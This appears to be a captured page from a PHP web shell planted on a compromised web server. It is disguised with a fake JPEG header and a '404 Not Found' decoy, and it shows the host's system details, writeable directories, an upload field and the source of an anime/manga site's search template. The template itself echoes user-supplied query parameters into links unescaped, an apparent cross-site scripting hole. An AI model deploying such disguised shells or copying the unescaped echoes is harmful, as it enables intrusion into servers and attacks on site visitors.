ÿØÿàJFIFÿÛ„ ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/okanime.top/code/search/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/okanime.top/code/search/list_tpl.php
<div class="Body Container">
    <div class="Content">
        <nav aria-label="breadcrumb">
            <ol class="breadcrumb">
                <li class="breadcrumb-item"><a href="/"><i class="fa fa-home"></i></a></li>
                <?php echo $txt_breadcrumb;?>
            </ol>
        </nav>

        <!--<ol class="breadcrumb">
            <li itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem"><a itemprop="item" title="Trang ch&#7911;" href="wibu47.html"><span itemprop="name"><i class="fa fa-home"></i>Trang ch&#7911;</span></a>
                <meta itemprop="position" content="1">
            </li>
            <li itemprop="itemListElement" itemscope="" itemtype="http://schema.org/ListItem"><a itemprop="item" title="T&igrave;m ki&#7871;m phim, &#273;&#7841;o di&#7877;n, nh&acirc;n v&#7853;t" href="wibu47.html"><span itemprop="name">T&igrave;m ki&#7871;m</span></a>
                <meta itemprop="position" content="2">
            </li>
            <li class="active">anime</li>
        </ol>-->
        <!--<div class="list-movie-filter SearchMovies" style="margin-bottom: 50px;">
            <div class="ml-title ml-title-page">
                <span>TH&#7874; LO&#7840;I  anime</span>
                <div class="clearfix"></div>
            </div>
        </div>-->
        <div class="TpRwCont">
            <main>
                <section>
                    <div class="Top text-center">
                        <?php if(!empty($genres_name)) { ?>
                            <div class="alert alert-warning alert-dismissible show" role="alert">
                                <strong>Genres: <?php echo $genres_name;?></strong> You should check in on some of those fields below.
                                <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close" onclick="location.href='/genres/'"></button>
                            </div>
                        <?php } ?>

                        <div class="row">
                            <div class="col-sm-2">
                                <span>Manga status:</span>
                            </div>
                            <div class="col-sm-10">
                                <ol class="list-inline text-center">
                                    <li class="list-inline-item">
                                        <a href="?act=search&f[status]=all<?php if(isset($f['sortby'])){
                                            echo '&f[sortby]='.$f['sortby'];}
                                        ?><?php if(isset($f['genres'])){
                                            echo '&f[genres]='.$f['genres'];}
                                        ?><?php if(isset($f['keyword'])){
                                            echo '&f[keyword]='.$f['keyword'];}
                                        ?>" class="btn btn-sm btn-secondary <?php if(isset($f['status']) and $f['status']=='all'){echo 'active';}?>">All</a>
                                    </li>
                                    <li class="list-inline-item">
                                        <a href="?act=search&f[status]=complete<?php if(isset($f['sortby'])){
                                            echo '&f[sortby]='.$f['sortby'];}
                                        ?><?php if(isset($f['genres'])){
                                            echo '&f[genres]='.$f['genres'];}
                                        ?><?php if(isset($f['keyword'])){
                                            echo '&f[keyword]='.$f['keyword'];}
                                        ?>" class="btn btn-sm btn-secondary <?php if(isset($f['status']) and $f['status']=='complete'){echo 'active';}?>">Complete</a>
                                    </li>
                                    <li class="list-inline-item">
                                        <a href="?act=search&f[status]=in-process<?php if(isset($f['sortby'])){
                                            echo '&f[sortby]='.$f['sortby'];}
                                        ?><?php if(isset($f['genres'])){
                                            echo '&f[genres]='.$f['genres'];}
                                        ?><?php if(isset($f['keyword'])){
                                            echo '&f[keyword]='.$f['keyword'];}
                                        ?>" class="btn btn-sm btn-secondary <?php if(isset($f['status']) and $f['status']=='in-process'){echo 'active';}?>">In process</a>
                                    </li>
                                    <li class="list-inline-item">
                                        <a href="?act=search&f[status]=pause<?php if(isset($f['sortby'])){
                                            echo '&f[sortby]='.$f['sortby'];}
                                        ?><?php if(isset($f['genres'])){
                                            echo '&f[genres]='.$f['genres'];}
                                        ?><?php if(isset($f['keyword'])){
                                            echo '&f[keyword]='.$f['keyword'];}
                                        ?>" class="btn btn-sm btn-secondary <?php if(isset($f['status']) and $f['status']=='pause'){echo 'active';}?>">Pause</a>
                                    </li>
                                </ol>
                            </div>
                        </div>
                        <div class="row">
                            <div class="col-sm-3">
                                <span>Sort by:</span>
                            </div>
                            <div class="col-sm-9">
                                <ol class="list-inline">
                                    <li class="list-inline-item">
                                        <a href="?act=search<?php if(isset($f['status'])){
                                            echo '&f[status]='.$f['status'];}
                                        ?>&f[sortby]=lastest-chap<?php if(isset($f['genres'])){
                                            echo '&f[genres]='.$f['genres'];}
                                        ?><?php if(isset($f['keyword'])){
                                            echo '&f[keyword]='.$f['keyword'];}
                                        ?>" class="btn btn-sm btn-secondary <?php if(isset($f['sortby']) and $f['sortby']=='lastest-chap'){echo 'active';}?>">Lastest update</a>
                                    </li>
                                    <li class="list-inline-item">
                                        <a href="?act=search<?php if(isset($f['status'])){
                                            echo '&f[status]='.$f['status'];}
                                        ?>&f[sortby]=hot<?php if(isset($f['genres'])){
                                            echo '&f[genres]='.$f['genres'];}
                                        ?><?php if(isset($f['keyword'])){
                                            echo '&f[keyword]='.$f['keyword'];}
                                        ?>" class="btn btn-sm btn-secondary <?php if(isset($f['sortby']) and $f['sortby']=='hot'){echo 'active';}?>">Hot</a>
                                    </li>
                                    <li class="list-inline-item">
                                        <a href="?act=search<?php if(isset($f['status'])){
                                            echo '&f[status]='.$f['status'];}
                                        ?>&f[sortby]=lastest-manga<?php if(isset($f['genres'])){
                                            echo '&f[genres]='.$f['genres'];}
                                        ?><?php if(isset($f['keyword'])){
                                            echo '&f[keyword]='.$f['keyword'];}
                                        ?>" class="btn btn-sm btn-secondary <?php if(isset($f['sortby']) and $f['sortby']=='lastest-manga'){echo 'active';}?>">New</a>
                                    </li>
                                    <li class="list-inline-item">
                                        <a href="?act=search<?php if(isset($f['status'])){
                                            echo '&f[status]='.$f['status'];}
                                        ?>&f[sortby]=top-manga<?php if(isset($f['genres'])){
                                            echo '&f[genres]='.$f['genres'];}
                                        ?><?php if(isset($f['keyword'])){
                                            echo '&f[keyword]='.$f['keyword'];}
                                        ?>" class="btn btn-sm btn-secondary <?php if(isset($f['sortby']) and $f['sortby']=='top-manga'){echo 'active';}?>">Top all</a>
                                    </li>
                                    <li class="list-inline-item">
                                        <a href="?act=search<?php if(isset($f['status'])){
                                            echo '&f[status]='.$f['status'];}
                                        ?>&f[sortby]=top-month<?php if(isset($f['genres'])){
                                            echo '&f[genres]='.$f['genres'];}
                                        ?><?php if(isset($f['keyword'])){
                                            echo '&f[keyword]='.$f['keyword'];}
                                        ?>" class="btn btn-sm btn-secondary <?php if(isset($f['sortby']) and $f['sortby']=='top-month'){echo 'active';}?>">Top month</a>
                                    </li>
                                    <li class="list-inline-item">
                                        <a href="?act=search<?php if(isset($f['status'])){
                                            echo '&f[status]='.$f['status'];}
                                        ?>&f[sortby]=top-week<?php if(isset($f['genres'])){
                                            echo '&f[genres]='.$f['genres'];}
                                        ?><?php if(isset($f['keyword'])){
                                            echo '&f[keyword]='.$f['keyword'];}
                                        ?>" class="btn btn-sm btn-secondary <?php if(isset($f['sortby']) and $f['sortby']=='top-week'){echo 'active';}?>">Top week</a>
                                    </li>
                                    <li class="list-inline-item">
                                        <a href="?act=search<?php if(isset($f['status'])){
                                            echo '&f[status]='.$f['status'];}
                                        ?>&f[sortby]=top-day<?php if(isset($f['genres'])){
                                            echo '&f[genres]='.$f['genres'];}
                                        ?><?php if(isset($f['keyword'])){
                                            echo '&f[keyword]='.$f['keyword'];}
                                        ?>" class="btn btn-sm btn-secondary <?php if(isset($f['sortby']) and $f['sortby']=='top-day'){echo 'active';}?>">Top day</a>
                                    </li>
                                    <li class="list-inline-item">
                                        <a href="?act=search<?php if(isset($f['status'])){
                                            echo '&f[status]='.$f['status'];}
                                        ?>&f[sortby]=follow<?php if(isset($f['genres'])){
                                            echo '&f[genres]='.$f['genres'];}
                                        ?><?php if(isset($f['keyword'])){
                                            echo '&f[keyword]='.$f['keyword'];}
                                        ?>" class="btn btn-sm btn-secondary  <?php if(isset($f['sortby']) and $f['sortby']=='follow'){echo 'active';}?>">Follow</a>
                                    </li>
                                    <li class="list-inline-item">
                                        <a href="?act=search<?php if(isset($f['status'])){
                                            echo '&f[status]='.$f['status'];}
                                        ?>&f[sortby]=comment<?php if(isset($f['genres'])){
                                            echo '&f[genres]='.$f['genres'];}
                                        ?><?php if(isset($f['keyword'])){
                                            echo '&f[keyword]='.$f['keyword'];}
                                        ?>" class="btn btn-sm btn-secondary <?php if(isset($f['sortby']) and $f['sortby']=='comment'){echo 'active';}?>">Comment</a>
                                    </li>
                                    <li class="list-inline-item">
                                        <a href="?act=search<?php if(isset($f['status'])){
                                            echo '&f[status]='.$f['status'];}
                                        ?>&f[sortby]=num-chap<?php if(isset($f['genres'])){
                                            echo '&f[genres]='.$f['genres'];}
                                        ?><?php if(isset($f['keyword'])){
                                            echo '&f[keyword]='.$f['keyword'];}
                                        ?>" class="btn btn-sm btn-secondary <?php if(isset($f['sortby']) and $f['sortby']=='num-chap'){echo 'active';}?>">Num. Episode</a>
                                    </li>
                                </ol>
                            </div>
                        </div>
                    </div>
                    <ul class="MovieList Rows AX A06 B04 C03 E20">
                        <?php echo $list;?>
                    </ul>
                </section>
                <div class="Bot text-center">
                    <nav aria-label="Page navigation example">
                        <ul class="pagination">
                            <?php echo $nav;?>
                        </ul>
                    </nav>
                </div>
            </main>
            <aside class="widget-area" role="complementary">

                <div class="card mb-2" data-bs-theme="dark">
                    <div class="card-header">Genres</div>
                    <div class="card-body">
                        <ul class="nav-genres">
                            <?php
                            echo get_list_genres_left($categories);
                            ?>
                        </ul>
                    </div>
                </div>

                <?php
                $txt_follow = follow_manga();
                if(!empty($txt_follow)){
                    ?>
                    <section class="Wdgt" id="showFollow">
                        <div class="Title">Follow</div>
                        <ul class="MovieList">
                            <?php echo $txt_follow;?>
                            <!--<li><a href="danh-muc.html">Xem th&ecirc;m..</a></li>-->
                        </ul>
                    </section>
                <?php } ?>

                <?php
                $txt_history = history_manga();
                if(!empty($txt_history)){
                    ?>
                    <section class="Wdgt" id="showHistory">
                        <div class="Title">History</div>
                        <ul class="MovieList">
                            <?php echo $txt_history;?>
                        </ul>
                    </section>
                <?php } ?>

                <div class="Dvr-300"></div>
            </aside>
        </div>
    </div>
</div>

ZeroDay Forums Mini